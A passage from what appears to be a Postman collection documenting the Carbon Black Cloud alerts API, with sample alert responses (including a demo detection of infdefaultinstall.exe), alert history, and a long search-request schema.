\"aus5.mozilla.org\",\n    \"netconn_remote_ip\": \"1.2.3.4\",\n    \"netconn_local_ip\": \"5.6.7.8\",\n    \"netconn_remote_ipv4\": \"1.2.3.4\",\n    \"netconn_local_ipv4\": \"5.6.7.8\"\n}"},{"id":"3d5f5a49-a6a0-4739-bffa-1921a44e96ab","name":"Get Alert by Id - WATCHLIST Alert","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"Text","header":[{"key":"Date","value":"Sun, 16 Apr 2023 17:09:08 GMT"},{"key":"Content-Type","value":"application/json","description":""},{"key":"Content-Length","value":"1830"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"org_key\": \"ABCD1234\",\n    \"alert_url\": \"https://defense.conferdeploy.net/alerts?s[c][query_string]=id:52fa009d-e2d1-4118-8a8d-04f521ae66aa&orgKey=ABCD1234\",\n    \"id\": \"12ab345cd6-e2d1-4118-8a8d-04f521ae66aa\",\n    \"type\": \"WATCHLIST\",\n    \"backend_timestamp\": \"2023-04-14T21:30:40.570Z\",\n    \"user_update_timestamp\": null,\n    \"backend_update_timestamp\": \"2023-04-14T21:30:40.570Z\",\n    \"detection_timestamp\": \"2023-04-14T21:27:14.719Z\",\n    \"first_event_timestamp\": \"2023-04-14T21:21:42.193Z\",\n    \"last_event_timestamp\": \"2023-04-14T21:21:42.193Z\",\n    \"category\": \"THREAT\",\n    \"severity\": 8,\n    \"reason\": \"Process infdefaultinstall.exe was detected by the report \\\"Defense Evasion - Signed Binary Proxy Execution - InfDefaultInstall\\\" in 6 watchlists\",\n    \"reason_code\": \"05696200-88e6-3691-a1e3-8d9a64dbc24e:7828aec8-8502-3a43-ae68-41b5050dab5b\",\n    \"threat_id\": \"0569620088E6669121E38D9A64DBC24E\",\n    \"primary_event_id\": \"-7RlZFHcSGWKSrF55B_4Ig-0\",\n    \"policy_applied\": \"NOT_APPLIED\",\n    \"run_state\": \"RAN\",\n    \"sensor_action\": \"ALLOW\",\n    \"workflow\": {\n        \"change_timestamp\": \"2023-04-14T21:30:40.570Z\",\n        \"changed_by_type\": \"SYSTEM\",\n        \"changed_by\": \"ALERT_CREATION\",\n        \"closure_reason\": \"NO_REASON\",\n        \"status\": \"OPEN\"\n    },\n    \"determination\": null,\n    \"tags\": [\n        \"tag1\",\n        \"tag2\"\n    ],\n    \"alert_notes_present\": false,\n    \"threat_notes_present\": false,\n    \"is_updated\": false,\n    \"device_id\": 18118174,\n    \"device_name\": \"pscr-test-01-1677785028.620244-9\",\n    \"device_uem_id\": \"\",\n    \"device_target_value\": \"LOW\",\n    \"device_policy\": \"123abcde-c21b-4d64-9e3e-53595ef9c7af\",\n    \"device_policy_id\": 1234567,\n    \"device_os\": \"WINDOWS\",\n    \"device_os_version\": \"Windows 10 x64 SP: 1\",\n    \"device_username\": \"demouser@demoorg.com\",\n    \"device_location\": \"UNKNOWN\",\n    \"device_external_ip\": \"1.2.3.4\",\n    \"mdr_alert\": false,\n    \"report_id\": \"oJFtoawGS92fVMXlELC1Ow-b4ee93fc-ec58-436a-a940-b4d33a613513\",\n    \"report_name\": \"Defense Evasion - Signed Binary Proxy Execution - InfDefaultInstall\",\n    \"report_description\": \"\\n\\nThreat:\\nThis behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.\\n\\nFalse Positives:\\nSome environments may legitimate use this, but should be rare.\\n\\nScore:\\n85\",\n    \"report_tags\": [\n        \"attack\",\n        \"attackframework\",\n        \"threathunting\"\n    ],\n    \"report_link\": \"https://attack.mitre.org/wiki/Technique/T1218\",\n    \"ioc_id\": \"b4ee93fc-ec58-436a-a940-b4d33a613513-0\",\n    \"ioc_hit\": \"((process_name:InfDefaultInstall.exe)) -enriched:true\",\n    \"watchlists\": [\n        {\n            \"id\": \"9x0timurQkqP7FBKX4XrUw\",\n            \"name\": \"Carbon Black Advanced Threats\"\n        }\n    ],\n    \"process_guid\": \"ABCD1234-0114761e-00002ae4-00000000-19db1ded53e8000\",\n    \"process_pid\": 10980,\n    \"process_name\": \"infdefaultinstall.exe\",\n    \"process_sha256\": \"1a2345cd88666a458f804e5d0fe925a9f55cf016733458c58c1980addc44cd774\",\n    \"process_md5\": \"12c34567894a49f13193513b0138f72a9\",\n    \"process_effective_reputation\": \"LOCAL_WHITE\",\n    \"process_reputation\": \"NOT_LISTED\",\n    \"process_cmdline\": \"InfDefaultInstall.exe C:\\\\Users\\\\username\\\\userdir\\\\Infdefaultinstall.inf\",\n    \"process_username\": \"DEMO\\\\DEMOUSER\",\n    \"process_signatures\": [\n        {\n            \"certificate_authority\": \"Demo Code Signing CA - G2\",\n            \"publisher\": \"Demo Test Authority\"\n        }\n    ],\n    \"childproc_guid\": \"\",\n    \"childproc_username\": \"\",\n    \"childproc_cmdline\": \"\",\n    \"ml_classification_final_verdict\": \"NOT_ANOMALOUS\",\n    \"ml_classification_global_prevalence\": \"LOW\",\n    \"ml_classification_org_prevalence\": \"LOW\"\n}"},{"id":"1b63ed37-e4a1-4e20-958d-96a213ac3c97","name":"Get Alert by Id - Id does not exist","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}"},"status":"Not Found","code":404,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 17:15:56 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"149"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=66473D6DB8DCD7BD02ADBF8C58BA3B44; Path=/api/alerts; Secure; HttpOnly"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"error_code\": \"NOT_FOUND\",\n    \"message\": \"Failed to look up alert, orgKey: ABCD1234, alert id: id_does_not_exist_demo\",\n    \"org_key\": \"ABCD1234\",\n    \"resource_type\": \"Alert\"\n}"}],"_postman_id":"db3627af-02ea-4876-8e86-331ea08ce260"},{"name":"Get Alert History","id":"6e0d6001-b6a5-4a9d-b7d3-86b35c290315","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/history","description":"<p>Get a single alert using an ID.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/alerts-api\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","alerts","v7","orgs","{{cb_org_key}}","alerts","{{cb_alert_id}}","history"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"3ef2a7d2-1d5d-4c6e-acdd-d23c34ee5895","name":"Get Alert History By ID","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"*/*"}],"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/{{cb_alert_id}}/history"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Sun, 16 Apr 2023 23:35:17 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"346"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Content-Encoding","value":"br"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Vary","value":"Accept-Encoding"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"history\": [\n        {\n            \"type\": \"USER_WORKFLOW_UPDATE\",\n            \"workflow\": {\n                \"change_timestamp\": \"2023-04-14T21:30:40.570Z\",\n                \"changed_by_type\": \"SYSTEM\",\n                \"changed_by\": \"ALERT_CREATION\",\n                \"closure_reason\": \"NO_REASON\",\n                \"status\": \"OPEN\"\n            }\n        },\n        {\n            \"type\": \"ALERT_NOTE_ADDED\",\n            \"note\": {\n                \"author\": \"demouser@demoorg.com\",\n                \"create_timestamp\": \"2023-04-16T23:35:10.295Z\",\n                \"last_update_timestamp\": \"2023-04-16T23:35:10.295Z\",\n                \"id\": \"eb0c0791-505b-408e-8b03-24562a95a875\",\n                \"source\": \"CUSTOMER\",\n                \"note\": \"A note for API demo\",\n                \"parent_id\": null,\n                \"read_history\": null,\n                \"thread\": null\n            }\n        }\n    ]\n}"}],"_postman_id":"6e0d6001-b6a5-4a9d-b7d3-86b35c290315"},{"name":"Validate Search Request","id":"5f1ee0e0-c073-49b7-a2ec-2e3db2fba56c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"}],"body":{"mode":"raw","raw":"{\n    \"time_range\": {\n        \"range\": \"-10d\"\n    },\n        \"type\": [\n            \"WATCHLIST\"\n        ],\n        \"category\": [\n            \"THREAT\",\n            \"MONITORED\"\n        ],\n        \"minimum_severity\": \"1\",\n    \"start\": 1,\n    \"rows\": 100,\n    \"sort\": [\n        {\n            \"field\": \"backend_update_timestamp\",\n            \"order\": \"desc\"\n        }\n    ]\n}","options":{"raw":{"headerFamily":"json","language":"json"}}},"url":"{{cb_url}}/api/alerts/v7/orgs/{{cb_org_key}}/alerts/_validate","description":"<p>Check if the search reqeust is valid.</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.alerts</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><h3 id=\"request-schema\">Request Schema</h3>\n<pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n  \"query\": \"&lt;string&gt;\",\n  \"time_range\": {\n    \"start\": \"&lt;dateTime&gt;\",\n    \"end\": \"&lt;dateTime&gt;\",\n    \"range\": \"&lt;string&gt;\"\n  },\n  \"criteria\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"\n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"\n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"\n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"\n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"connection_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"egress_group_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"egress_group_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"ip_reputation\": [\n      &lt;integer&gt;\n    ],r\n    \"remote_is_private\": &lt;boolean&gt;,\n    \"remote_namespace\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"remote_replica_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"remote_workload_kind\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"remote_workload_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"tms_rule_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"threat_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"vendor_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"vendor_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"product_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"product_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"external_device_friendly_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"serial_number\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"blocked_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"blocked_sha256\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"blocked_md5\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"blocked_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_final_verdict\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_global_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ml_classification_org_prevalence\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_alert\": &lt;boolean&gt;,\n    \"mdr_workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_workflow_is_assigned\": &lt;boolean&gt;,\n    \"mdr_determination_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"mdr_determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"mdr_alert_notes_present\": &lt;boolean&gt;,\n    \"mdr_threat_notes_present\": &lt;boolean&gt;\n  },\n  \"exclusions\": {\n    \"org_key\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"backend_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"user_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"backend_update_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"detection_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"first_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"last_event_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"minimum_severity\": &lt;integer&gt;,\n    \"reason_code\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"threat_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"primary_event_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"policy_applied\": [\n      \"&lt;string&gt;\"\n    ],\n    \"run_state\": [\n      \"&lt;string&gt;\"\n    ],\n    \"sensor_action\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_status\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"workflow_changed_by_type\": [\n      \"&lt;string&gt;\"\n    ],\n    \"workflow_changed_by_autoclose_rule_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"workflow_closure_reason\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"determination_value\": [\n      \"FALSE_POSITIVE\",\n      \"NONE\"\n    ],\n    \"determination_change_timestamp\": {\n      \"start\": \"&lt;dateTime&gt;\",\n      \"end\": \"&lt;dateTime&gt;\",\n      \"range\": \"&lt;string&gt;\"\n    },\n    \"determination_changed_by_type\": [\n      \"API\",\n      \"MDR\"\n    ],\n    \"tags\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"alert_notes_present\": &lt;boolean&gt;,\n    \"threat_notes_present\": &lt;boolean&gt;,\n    \"device_id\": [\n      &lt;long&gt;\n    ],\n    \"device_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_uem_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_policy\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_policy_id\": [\n      &lt;long&gt;\n    ],\n    \"device_target_value\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_os_version\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_username\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_location\": [\n      \"&lt;string&gt;\"\n    ],\n    \"device_external_ip\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"device_internal_ip\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"rule_config_type\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"rule_config_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"rule_config_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"rule_category_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"rule_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_guid\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_pid\": [\n      &lt;integer&gt;\n    ],\n    \"process_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_sha256\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_md5\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"process_cmdline\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_username\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_signatures_certificate_authority\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"process_signatures_publisher\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_guid\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_pid\": [\n      &lt;integer&gt;\n    ],\n    \"parent_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_sha256\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_md5\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"parent_cmdline\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"parent_username\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_guid\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_sha256\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_md5\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_effective_reputation\": [\n      \"&lt;string&gt;\"\n    ],\n    \"childproc_username\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"childproc_cmdline\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_remote_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_local_port\": [\n      &lt;integer&gt;\n    ],\n    \"netconn_protocol\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_remote_domain\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_remote_ip\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_local_ip\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_remote_ipv4\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_local_ipv4\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_remote_ipv6\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"netconn_local_ipv6\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"threat_category\": [\n      \"&lt;string&gt;\"\n    ],\n    \"ttps\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"attack_tactic\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"attack_technique\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"report_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"report_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"report_link\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"watchlists_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"watchlists_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_policy_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_policy\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_rule_id\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"k8s_rule\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"cluster_name\": [\n      \"&lt;string&gt;\"\n    ],\n    \"namespace\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"workload_kind\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"workload_name\": [\n      \"&lt;string&gt;\"    \n    ],\n    \"replica_id\": [\n      \"&lt;string&gt;\"\n    ],\n    \"connection_type\": [\n      \"INGRESS\"\n    ],\n    